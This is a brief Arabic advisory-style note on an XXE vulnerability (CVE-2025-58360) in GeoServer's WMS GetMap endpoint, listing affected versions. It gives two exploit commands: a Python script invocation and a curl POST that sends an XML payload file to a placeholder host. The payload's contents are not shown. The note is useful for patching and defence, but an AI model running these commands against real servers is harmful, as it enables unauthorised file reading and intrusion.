
XXE من خلال نقطة نهاية محددة /geoserver/wms عملية GetMap - Geoserver
من الإصدار 2.26.0 إلى ما قبل 2.26.2 وقبل 2.25.6، تم تحديد ثغرة في الكيان الخارجي لـ XML (XXE). يقبل التطبيق إدخال XML من خلال نقطة نهاية محددة /geoserver/wms لعملية GetMap

استغلال1:
python3 CVE-2025-58360 -u http://example.com
استغلال2:
curl -X POST "http://example.com/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png